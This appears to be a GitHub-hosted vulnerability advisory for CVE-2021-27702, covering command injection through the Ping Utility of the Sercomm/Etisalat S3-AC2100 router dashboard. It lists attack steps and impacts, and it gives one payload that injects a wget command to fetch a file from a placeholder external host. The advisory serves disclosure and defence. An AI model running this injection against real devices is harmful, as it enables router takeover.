-
Notifications
You must be signed in to change notification settings - Fork 0
/
CVE-2021-27702
18 lines (16 loc) · 2.52 KB
/
CVE-2021-27702
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
The Sercomm Router Etisalat Model S3-AC2100 is vulnerable to Incorrect Access Control through its Diagnostic Utility available within the router's dashboard. This vulnerability occurs because the diagnostic utility, specifically the Ping Utility, lacks proper access controls or validation, allowing unauthorized users to execute arbitrary commands on the router.
By exploiting this vulnerability, an attacker who gains access to the router's dashboard can inject malicious commands into the Ping Utility. This is typically done by entering crafted input, such as a remote file inclusion (RFI) attack, in the IP address or command field. This could potentially allow the attacker to execute arbitrary commands, leading to a compromise of the router.
Attack Vector:
Login to Router Dashboard: The attacker first needs to log into the router’s dashboard, typically requiring valid credentials.
Access the Diagnostic Utility: Once inside the router dashboard, the attacker navigates to the Diagnostic Utility section.
Use the Ping Utility: In the Ping Utility, the attacker can input an IP address followed by a crafted command. For example:
127.0.0.1| wget https://x.x.x.x/rfi.txt
This injects a command into the Ping Utility that the router then executes.
Command Execution: The injected command is processed by the router, which may then download and execute a remote file (such as rfi.txt) from an external server. The content of this file could be malicious, leading to further exploitation, such as remote code execution (RCE), system compromise, or unauthorized access to sensitive router settings.
Impact:
Remote Code Execution (RCE): By exploiting this vulnerability, an attacker can potentially execute arbitrary code on the router, leading to full control over the device.
System Compromise: The attacker could manipulate router settings, install malicious firmware, or disrupt normal operation by altering configuration files or executing harmful commands.
Data Theft or Leak: If the attacker gains full access, they could exfiltrate sensitive data stored on the router or monitor network traffic.
Privilege Escalation: Successful exploitation could lead to privilege escalation, allowing the attacker to perform administrative actions, change network settings, or bypass security measures.
Network Disruption: The attacker may cause network outages, block legitimate access, or create backdoors for continued access.
Reputation Damage: Affected users could lose trust in the device and the service provider (e.g., Etisalat), leading to potential customer churn.